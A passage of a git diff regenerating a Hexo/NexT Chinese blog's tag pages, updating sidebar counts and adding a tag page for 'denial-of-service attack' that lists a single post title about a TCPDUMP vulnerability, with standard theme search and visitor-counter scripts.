-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -399,7 +399,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -470,7 +470,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/tags/小米/index.html b/tags/小米/index.html
index ad4100ee..5007f1d8 100644
--- a/tags/小米/index.html
+++ b/tags/小米/index.html
@@ -429,7 +429,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -451,7 +451,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -522,7 +522,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/tags/微信/index.html b/tags/微信/index.html
index 73c56c3b..eda6bc9f 100644
--- a/tags/微信/index.html
+++ b/tags/微信/index.html
@@ -377,7 +377,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -399,7 +399,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -470,7 +470,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/tags/拒绝服务攻击/index.html b/tags/拒绝服务攻击/index.html
new file mode 100644
index 00000000..4c66ea63
--- /dev/null
+++ b/tags/拒绝服务攻击/index.html
@@ -0,0 +1,1125 @@
+<!DOCTYPE html>
+
+
+
+  
+
+
+<html class="theme-next gemini use-motion" lang="zh-Hans">
+<head><meta name="generator" content="Hexo 3.8.0">
+  <meta charset="UTF-8">
+<meta http-equiv="X-UA-Compatible" content="IE=edge">
+<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
+<meta name="theme-color" content="#222">
+
+
+
+
+
+
+
+
+
+<meta http-equiv="Cache-Control" content="no-transform">
+<meta http-equiv="Cache-Control" content="no-siteapp">
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+  
+  
+  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">
+
+
+
+
+
+
+
+<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">
+
+<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">
+
+
+  <link rel="apple-touch-icon" sizes="180x180" href="/images/hackerrank.png?v=5.1.4">
+
+
+  <link rel="icon" type="image/png" sizes="32x32" href="/images/hackerrank.png?v=5.1.4">
+
+
+  <link rel="icon" type="image/png" sizes="16x16" href="/images/hackerrank.png?v=5.1.4">
+
+
+  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">
+
+
+
+
+
+  <meta name="keywords" content="Hexo, NexT">
+
+
+
+
+
+
+
+
+
+
+<meta property="og:type" content="website">
+<meta property="og:title" content="混元霹雳手">
+<meta property="og:url" content="https://cool-y.github.io/tags/拒绝服务攻击/index.html">
+<meta property="og:site_name" content="混元霹雳手">
+<meta property="og:locale" content="zh-Hans">
+<meta name="twitter:card" content="summary">
+<meta name="twitter:title" content="混元霹雳手">
+
+
+
+<script type="text/javascript" id="hexo.configurations">
+  var NexT = window.NexT || {};
+  var CONFIG = {
+    root: '/',
+    scheme: 'Gemini',
+    version: '5.1.4',
+    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
+    fancybox: true,
+    tabs: true,
+    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
+    duoshuo: {
+      userId: '0',
+      author: '博主'
+    },
+    algolia: {
+      applicationID: '',
+      apiKey: '',
+      indexName: '',
+      hits: {"per_page":10},
+      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
+    }
+  };
+</script>
+
+
+
+  <link rel="canonical" href="https://cool-y.github.io/tags/拒绝服务攻击/">
+
+
+
+
+
+  <title>标签: 拒绝服务攻击 | 混元霹雳手</title>
+  
+
+
+
+
+
+
+
+
+</head>
+
+<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">
+
+  
+  
+    
+  
+
+  <div class="container sidebar-position-left ">
+    <div class="headband"></div>
+
+    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
+      <div class="header-inner"><div class="site-brand-wrapper">
+  <div class="site-meta ">
+    
+
+    <div class="custom-logo-site-title">
+      <a href="/" class="brand" rel="start">
+        <span class="logo-line-before"><i></i></span>
+        <span class="site-title">混元霹雳手</span>
+        <span class="logo-line-after"><i></i></span>
+      </a>
+    </div>
+      
+        <p class="site-subtitle"></p>
+      
+  </div>
+
+  <div class="site-nav-toggle">
+    <button>
+      <span class="btn-bar"></span>
+      <span class="btn-bar"></span>
+      <span class="btn-bar"></span>
+    </button>
+  </div>
+</div>
+
+<nav class="site-nav">
+  
+
+  
+    <ul id="menu" class="menu">
+      
+        
+        <li class="menu-item menu-item-home">
+          <a href="/" rel="section">
+            
+              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
+            
+            首页
+          </a>
+        </li>
+      
+        
+        <li class="menu-item menu-item-about">
+          <a href="/about/" rel="section">
+            
+              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
+            
+            关于
+          </a>
+        </li>
+      
+        
+        <li class="menu-item menu-item-tags">
+          <a href="/tags/" rel="section">
+            
+              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
+            
+            标签
+          </a>
+        </li>
+      
+        
+        <li class="menu-item menu-item-categories">
+          <a href="/categories/" rel="section">
+            
+              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
+            
+            分类
+          </a>
+        </li>
+      
+        
+        <li class="menu-item menu-item-archives">
+          <a href="/archives/" rel="section">
+            
+              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
+            
+            归档
+          </a>
+        </li>
+      
+        
+        <li class="menu-item menu-item-bookmarks">
+          <a href="/bookmarks/" rel="section">
+            
+              <i class="menu-item-icon fa fa-fw fa-map"></i> <br>
+            
+            书签
+          </a>
+        </li>
+      
+
+      
+        <li class="menu-item menu-item-search">
+          
+            <a href="javascript:;" class="popup-trigger">
+          
+            
+              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
+            
+            搜索
+          </a>
+        </li>
+      
+    </ul>
+  
+
+  
+    <div class="site-search">
+      
+  <div class="popup search-popup local-search-popup">
+  <div class="local-search-header clearfix">
+    <span class="search-icon">
+      <i class="fa fa-search"></i>
+    </span>
+    <span class="popup-btn-close">
+      <i class="fa fa-times-circle"></i>
+    </span>
+    <div class="local-search-input-wrapper">
+      <input autocomplete="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
+    </div>
+  </div>
+  <div id="local-search-result"></div>
+</div>
+
+
+
+    </div>
+  
+</nav>
+
+
+
+ </div>
+    </header>
+
+    <main id="main" class="main">
+      <div class="main-inner">
+        <div class="content-wrap">
+          <div id="content" class="content">
+            
+
+  
+  
+  
+  <div class="post-block tag">
+
+    <div id="posts" class="posts-collapse">
+      <div class="collection-title">
+        <h1>拒绝服务攻击<small>标签</small>
+        </h1>
+      </div>
+
+      
+        
+
+  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
+    <header class="post-header">
+
+      <h2 class="post-title">
+        
+            <a class="post-title-link" href="/2018/12/25/TCPDUMP拒绝服务攻击漏洞/" itemprop="url">
+              
+                <span itemprop="name">TCPDUMP拒绝服务攻击漏洞</span>
+              
+            </a>
+        
+      </h2>
+
+      <div class="post-meta">
+        <time class="post-time" itemprop="dateCreated" datetime="2018-12-25T12:26:05+08:00" content="2018-12-25">
+          12-25
+        </time>
+      </div>
+
+    </header>
+  </article>
+
+
+      
+    </div>
+
+  </div>
+  
+  
+  
+
+  
+
+
+          </div>
+          
+
+
+          
+
+        </div>
+        
+          
+  
+  <div class="sidebar-toggle">
+    <div class="sidebar-toggle-line-wrap">
+      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
+      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
+      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
+    </div>
+  </div>
+
+  <aside id="sidebar" class="sidebar">
+    
+    <div class="sidebar-inner">
+
+      
+
+      
+
+      <section class="site-overview-wrap sidebar-panel sidebar-panel-active">
+        <div class="site-overview">
+          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
+            
+              <img class="site-author-image" itemprop="image" src="/images/avatar.png" alt="Cool-Y">
+            
+              <p class="site-author-name" itemprop="name">Cool-Y</p>
+              <p class="site-description motion-element" itemprop="description"></p>
+          </div>
+
+          <nav class="site-state motion-element">
+
+            
+              <div class="site-state-item site-state-posts">
+              
+                <a href="/archives/">
+              
+                  <span class="site-state-item-count">16</span>
+                  <span class="site-state-item-name">日志</span>
+                </a>
+              </div>
+            
+
+            
+              
+              
+              <div class="site-state-item site-state-categories">
+                <a href="/categories/index.html">
+                  <span class="site-state-item-count">6</span>
+                  <span class="site-state-item-name">分类</span>
+                </a>
+              </div>
+            
+
+            
+              
+              
+              <div class="site-state-item site-state-tags">
+                <a href="/tags/index.html">
+                  <span class="site-state-item-count">31</span>
+                  <span class="site-state-item-name">标签</span>
+                </a>
+              </div>
+            
+
+          </nav>
+
+          
+
+          
+            <div class="links-of-author motion-element">
+                
+                  <span class="links-of-author-item">
+                    <a href="https://github.com/Cool-Y" target="_blank" title="GitHub">
+                      
+                        <i class="fa fa-fw fa-github"></i>GitHub</a>
+                  </span>
+                
+                  <span class="links-of-author-item">
+                    <a href="mailto:cool.yim@whu.edu.cn" target="_blank" title="E-Mail">
+                      
+                        <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
+                  </span>
+                
+                  <span class="links-of-author-item">
+                    <a href="https://www.instagram.com/yan__han/" target="_blank" title="Instagram">
+                      
+                        <i class="fa fa-fw fa-instagram"></i>Instagram</a>
+                  </span>
+                
+            </div>
+          
+
+          
+          
+
+          
+          
+
+          
+
+        </div>
+      </section>
+
+      
+
+      
+
+    </div>
+  </aside>
+
+
+        
+      </div>
+    </main>
+
+    <footer id="footer" class="footer">
+      <div class="footer-inner">
+        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
+  <span class="with-love">
+    <i class="fa fa-user"></i>
+  </span>
+  <span class="author" itemprop="copyrightHolder">Cool-Y</span>
+
+  
+    <span class="post-meta-divider">|</span>
+    <span class="post-meta-item-icon">
+      <i class="fa fa-area-chart"></i>
+    </span>
+    
+    <span title="Site words total count">44.8k</span>
+  
+</div>
+
+
+  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>
+
+
+
+
+
+
+
+
+        
+<div class="busuanzi-count">
+    <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
+
+  
+    <span class="site-uv">
+      <i class="fa fa-user"></i>
+      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
+      
+    </span>
+  
+
+  
+    <span class="site-pv">
+      <i class="fa fa-eye"></i>
+      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
+      
+    </span>
+  
+</div>
+
+
+
+
+
+
+
+
+        
+      </div>
+    </footer>
+
+    
+      <div class="back-to-top">
+        <i class="fa fa-arrow-up"></i>
+        
+      </div>
+    
+
+    
+
+  </div>
+
+  
+
+<script type="text/javascript">
+  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
+    window.Promise = null;
+  }
+</script>
+
+
+
+
+
+
+
+
+
+  
+
+
+
+
+
+
+
+
+
+
+
+
+  
+  
+    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
+  
+
+  
+  
+    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
+  
+
+  
+  
+    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
+  
+
+  
+  
+    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
+  
+
+  
+  
+    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
+  
+
+  
+  
+    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
+  
+
+
+  
+
+
+  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>
+
+  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>
+
+
+
+  
+  
+
+
+  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>
+
+  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>
+
+
+
+  
+
+  
+
+
+  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>
+
+
+
+  
+
+
+  
+
+
+
+
+	
+
+
+
+
+
+  
+
+
+
+
+
+  
+
+
+
+
+
+
+
+<!-- LOCAL: You can save these files to your site and update links -->
+    
+        
+        <link rel="stylesheet" href="https://aimingoo.github.io/gitmint/style/default.css">
+        <script src="https://aimingoo.github.io/gitmint/dist/gitmint.browser.js"></script>
+    
+<!-- END LOCAL -->
+
+    
+
+    
+
+
+
+
+
+
+
+  
+
+  <script type="text/javascript">
+    // Popup Window;
+    var isfetched = false;
+    var isXml = true;
+    // Search DB path;
+    var search_path = "search.xml";
+    if (search_path.length === 0) {
+      search_path = "search.xml";
+    } else if (/json$/i.test(search_path)) {
+      isXml = false;
+    }
+    var path = "/" + search_path;
+    // monitor main search box;
+
+    var onPopupClose = function (e) {
+      $('.popup').hide();
+      $('#local-search-input').val('');
+      $('.search-result-list').remove();
+      $('#no-result').remove();
+      $(".local-search-pop-overlay").remove();
+      $('body').css('overflow', '');
+    }
+
+    function proceedsearch() {
+      $("body")
+        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
+        .css('overflow', 'hidden');
+      $('.search-popup-overlay').click(onPopupClose);
+      $('.popup').toggle();
+      var $localSearchInput = $('#local-search-input');
+      $localSearchInput.attr("autocapitalize", "none");
+      $localSearchInput.attr("autocorrect", "off");
+      $localSearchInput.focus();
+    }
+
+    // search function;
+    var searchFunc = function(path, search_id, content_id) {
+      'use strict';
+
+      // start loading animation
+      $("body")
+        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
+          '<div id="search-loading-icon">' +
+          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
+          '</div>' +
+          '</div>')
+        .css('overflow', 'hidden');
+      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');
+
+      $.ajax({
+        url: path,
+        dataType: isXml ? "xml" : "json",
+        async: true,
+        success: function(res) {
+          // get the contents from search data
+          isfetched = true;
+          $('.popup').detach().appendTo('.header-inner');
+          var datas = isXml ? $("entry", res).map(function() {
+            return {
+              title: $("title", this).text(),
+              content: $("content",this).text(),
+              url: $("url" , this).text()
+            };
+          }).get() : res;
+          var input = document.getElementById(search_id);
+          var resultContent = document.getElementById(content_id);
+          var inputEventFunction = function() {
+            var searchText = input.value.trim().toLowerCase();
+            var keywords = searchText.split(/[\s\-]+/);
+            if (keywords.length > 1) {
+              keywords.push(searchText);
+            }
+            var resultItems = [];
+            if (searchText.length > 0) {
+              // perform local searching
+              datas.forEach(function(data) {
+                var isMatch = false;
+                var hitCount = 0;
+                var searchTextCount = 0;
+                var title = data.title.trim();
+                var titleInLowerCase = title.toLowerCase();
+                var content = data.content.trim().replace(/<[^>]+>/g,"");
+                var contentInLowerCase = content.toLowerCase();
+                var articleUrl = decodeURIComponent(data.url);
+                var indexOfTitle = [];
+                var indexOfContent = [];
+                // only match articles with not empty titles
+                if(title != '') {
+                  keywords.forEach(function(keyword) {
+                    function getIndexByWord(word, text, caseSensitive) {
+                      var wordLen = word.length;
+                      if (wordLen === 0) {
+                        return [];
+                      }
+                      var startPosition = 0, position = [], index = [];
+                      if (!caseSensitive) {
+                        text = text.toLowerCase();
+                        word = word.toLowerCase();
+                      }
+                      while ((position = text.indexOf(word, startPosition)) > -1) {
+                        index.push({position: position, word: word});
+                        startPosition = position + wordLen;
+                      }
+                      return index;
+                    }
+
+                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
+                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
+                  });
+                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
+                    isMatch = true;
+                    hitCount = indexOfTitle.length + indexOfContent.length;
+                  }
+                }
+
+                // show search results
+
+                if (isMatch) {
+                  // sort index by position of keyword
+
+                  [indexOfTitle, indexOfContent].forEach(function (index) {
+                    index.sort(function (itemLeft, itemRight) {
+                      if (itemRight.position !== itemLeft.position) {
+                        return itemRight.position - itemLeft.position;
+                      } else {
+                        return itemLeft.word.length - itemRight.word.length;
+                      }
+                    });
+                  });
+
+                  // merge hits into slices
+
+                  function mergeIntoSlice(text, start, end, index) {
+                    var item = index[index.length - 1];
+                    var position = item.position;
+                    var word = item.word;
+                    var hits = [];
+                    var searchTextCountInSlice = 0;
+                    while (position + word.length <= end && index.length != 0) {
+                      if (word === searchText) {
+                        searchTextCountInSlice++;
+                      }
+                      hits.push({position: position, length: word.length});
+                      var wordEnd = position + word.length;
+
+                      // move to next position of hit
+
+                      index.pop();
+                      while (index.length != 0) {
+                        item = index[index.length - 1];
+                        position = item.position;
+                        word = item.word;
+                        if (wordEnd > position) {
+                          index.pop();
+                        } else {
+                          break;
+                        }
+                      }
+                    }
+                    searchTextCount += searchTextCountInSlice;
+                    return {
+                      hits: hits,
+                      start: start,
+                      end: end,
+                      searchTextCount: searchTextCountInSlice
+                    };
+                  }
+
+                  var slicesOfTitle = [];
+                  if (indexOfTitle.length != 0) {
+                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
+                  }
+
+                  var slicesOfContent = [];
+                  while (indexOfContent.length != 0) {
+                    var item = indexOfContent[indexOfContent.length - 1];
+                    var position = item.position;
+                    var word = item.word;
+                    // cut out 100 characters
+                    var start = position - 20;
+                    var end = position + 80;
+                    if(start < 0){
+                      start = 0;
+                    }
+                    if (end < position + word.length) {
+                      end = position + word.length;
+                    }
+                    if(end > content.length){
+                      end = content.length;
+                    }
+                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
+                  }
+
+                  // sort slices in content by search text's count and hits' count
+
+                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
+                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
+                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
+                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
+                      return sliceRight.hits.length - sliceLeft.hits.length;
+                    } else {
+                      return sliceLeft.start - sliceRight.start;
+                    }
+                  });
+
+                  // select top N slices in content
+
+                  var upperBound = parseInt('1');
+                  if (upperBound >= 0) {
+                    slicesOfContent = slicesOfContent.slice(0, upperBound);
+                  }
+
+                  // highlight title and content
+
+                  function highlightKeyword(text, slice) {
+                    var result = '';
+                    var prevEnd = slice.start;
+                    slice.hits.forEach(function (hit) {
+                      result += text.substring(prevEnd, hit.position);
+                      var end = hit.position + hit.length;
+                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
+                      prevEnd = end;
+                    });
+                    result += text.substring(prevEnd, slice.end);
+                    return result;
+                  }
+
+                  var resultItem = '';
+
+                  if (slicesOfTitle.length != 0) {
+                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
+                  } else {
+                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
+                  }
+
+                  slicesOfContent.forEach(function (slice) {
+                    resultItem += "<a href='" + articleUrl + "'>" +
+                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
+                      "...</p>" + "</a>";
+                  });
+
+                  resultItem += "</li>";
+                  resultItems.push({
+                    item: resultItem,
+                    searchTextCount: searchTextCount,
+                    hitCount: hitCount,
+                    id: resultItems.length
+                  });
+                }
+              })
+            };
+            if (keywords.length === 1 && keywords[0] === "") {
+              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
+            } else if (resultItems.length === 0) {
+              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
+            } else {
+              resultItems.sort(function (resultLeft, resultRight) {
+                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
+                  return resultRight.searchTextCount - resultLeft.searchTextCount;
+                } else if (resultLeft.hitCount !== resultRight.hitCount) {
+                  return resultRight.hitCount - resultLeft.hitCount;
+                } else {
+                  return resultRight.id - resultLeft.id;
+                }
+              });
+              var searchResultList = '<ul class=\"search-result-list\">';
+              resultItems.forEach(function (result) {
+                searchResultList += result.item;
+              })
+              searchResultList += "</ul>";
+              resultContent.innerHTML = searchResultList;
+            }
+          }
+
+          if ('auto' === 'auto') {
+            input.addEventListener('input', inputEventFunction);
+          } else {
+            $('.search-icon').click(inputEventFunction);
+            input.addEventListener('keypress', function (event) {
+              if (event.keyCode === 13) {
+                inputEventFunction();
+              }
+            });
+          }
+
+          // remove loading animation
+          $(".local-search-pop-overlay").remove();
+          $('body').css('overflow', '');
+
+          proceedsearch();
+        }
+      });
+    }
+
+    // handle and trigger popup window;
+    $('.popup-trigger').click(function(e) {
+      e.stopPropagation();
+      if (isfetched === false) {
+        searchFunc(path, 'local-search-input', 'local-search-result');
+      } else {
+        proceedsearch();
+      };
+    });
+
+    $('.popup-btn-close').click(onPopupClose);
+    $('.popup').click(function(e){
+      e.stopPropagation();
+    });
+    $(document).on('keyup', function (event) {
+      var shouldDismissSearchPopup = event.which === 27 &&
+        $('.search-popup').is(':visible');
+      if (shouldDismissSearchPopup) {
+        onPopupClose();
+      }
+    });
+  </script>
+
+
+
+
+
+  
+
+  
+  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
+  <script>AV.initialize("EWwoJgHNdlj6iBjiFlMcabUO-gzGzoHsz", "x8FxDrYG79C8YFrTww9ljo8K");</script>
+  <script>
+    function showTime(Counter) {
+      var query = new AV.Query(Counter);
+      var entries = [];
+      var $visitors = $(".leancloud_visitors");
+
+      $visitors.each(function () {
+        entries.push( $(this).attr("id").trim() );
+      });
+
+      query.containedIn('url', entries);
+      query.find()
+        .done(function (results) {
+          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';
+
+          if (results.length === 0) {
+            $visitors.find(COUNT_CONTAINER_REF).text(0);
+            return;
+          }
+
+          for (var i = 0; i < results.length; i++) {
+            var item = results[i];
+            var url = item.get('url');
+            var time = item.get('time');
+            var element = document.getElementById(url);
+
+            $(element).find(COUNT_CONTAINER_REF).text(time);
+          }
+          for(var i = 0; i < entries.length; i++) {
+            var url = entries[i];
+            var element = document.getElementById(url);
+            var countSpan = $(element).find(COUNT_CONTAINER_REF);
+            if( countSpan.text() == '') {
+              countSpan.text(0);
+            }
+          }
+        })
+        .fail(function (object, error) {
+          console.log("Error: " + error.code + " " + error.message);
+        });
+    }
+
+    function addCount(Counter) {
+      var $visitors = $(".leancloud_visitors");
+      var url = $visitors.attr('id').trim();
+      var title = $visitors.attr('data-flag-title').trim();
+      var query = new AV.Query(Counter);
+
+      query.equalTo("url", url);
+      query.find({
+        success: function(results) {
+          if (results.length > 0) {
+            var counter = results[0];
+            counter.fetchWhenSave(true);
+            counter.increment("time");
+            counter.save(null, {
+              success: function(counter) {
+                var $element = $(document.getElementById(url));
+                $element.find('.leancloud-visitors-count').text(counter.get('time'));
+              },
+              error: function(counter, error) {
+                console.log('Failed to save Visitor num, with error message: ' + error.message);
+              }
+            });
+          } else {
+            var newcounter = new Counter();
+            /* Set ACL */
+            var acl = new AV.ACL();
+            acl.setPublicReadAccess(true);
+            acl.setPublicWriteAccess(true);
+            newcounter.setACL(acl);
+            /* End Set ACL */
+            newcounter.set("title", title);
+            newcounter.set("url", url);
+            newcounter.set("time", 1);
+            newcounter.save(null, {
+              success: function(newcounter) {
+                var $element = $(document.getElementById(url));
+                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
+              },
+              error: function(newcounter, error) {
+                console.log('Failed to create');
+              }
+            });
+          }
+        },
+        error: function(error) {
+          console.log('Error:' + error.code + " " + error.message);
+        }
+      });
+    }
+
+    $(function() {
+      var Counter = AV.Object.extend("Counter");
+      if ($('.leancloud_visitors').length == 1) {
+        addCount(Counter);
+      } else if ($('.post-title-link').length > 1) {
+        showTime(Counter);
+      }
+    });
+  </script>
+
+
+
+  
+
+  
+<script>
+(function(){
+    var bp = document.createElement('script');
+    var curProtocol = window.location.protocol.split(':')[0];
+    if (curProtocol === 'https') {
+        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
+    }
+    else {
+        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
+    }
+    var s = document.getElementsByTagName("script")[0];
+    s.parentNode.insertBefore(bp, s);
+})();
+</script>
+
+
+  
+  
+
+  
+
+  
+
+  
+
+</body>
+</html>
diff --git a/tags/数据库/index.html b/tags/数据库/index.html
index 0dc0f4a3..7c0fd6db 100644
--- a/tags/数据库/index.html
+++ b/tags/数据库/index.html
@@ -403,7 +403,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -425,7 +425,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -496,7 +496,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/tags/数据挖掘/index.html b/tags/数据挖掘/index.html
index e7ed4c87..1cb3fd49 100644
--- a/tags/数据挖掘/index.html
+++ b/tags/数据挖掘/index.html
@@ -377,7 +377,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -399,7 +399,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -470,7 +470,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/tags/文件格式/index.html b/tags/文件格式/index.html
index 1368d2b5..c9b0fc34 100644
--- a/tags/文件格式/index.html
+++ b/tags/文件格式/index.html
@@ -403,7 +403,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -425,7 +425,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -496,7 +496,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/tags/模型实现/index.html b/tags/模型实现/index.html
index 18f4baf5..92b0712b 100644
--- a/tags/模型实现/index.html
+++ b/tags/模型实现/index.html
@@ -377,7 +377,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -399,7 +399,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -470,7 +470,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/tags/破解/index.html b/tags/破解/index.html
index e77f89a9..45b435a3 100644
--- a/tags/破解/index.html
+++ b/tags/破解/index.html
@@ -377,7 +377,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -399,7 +399,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -470,7 +470,7 @@
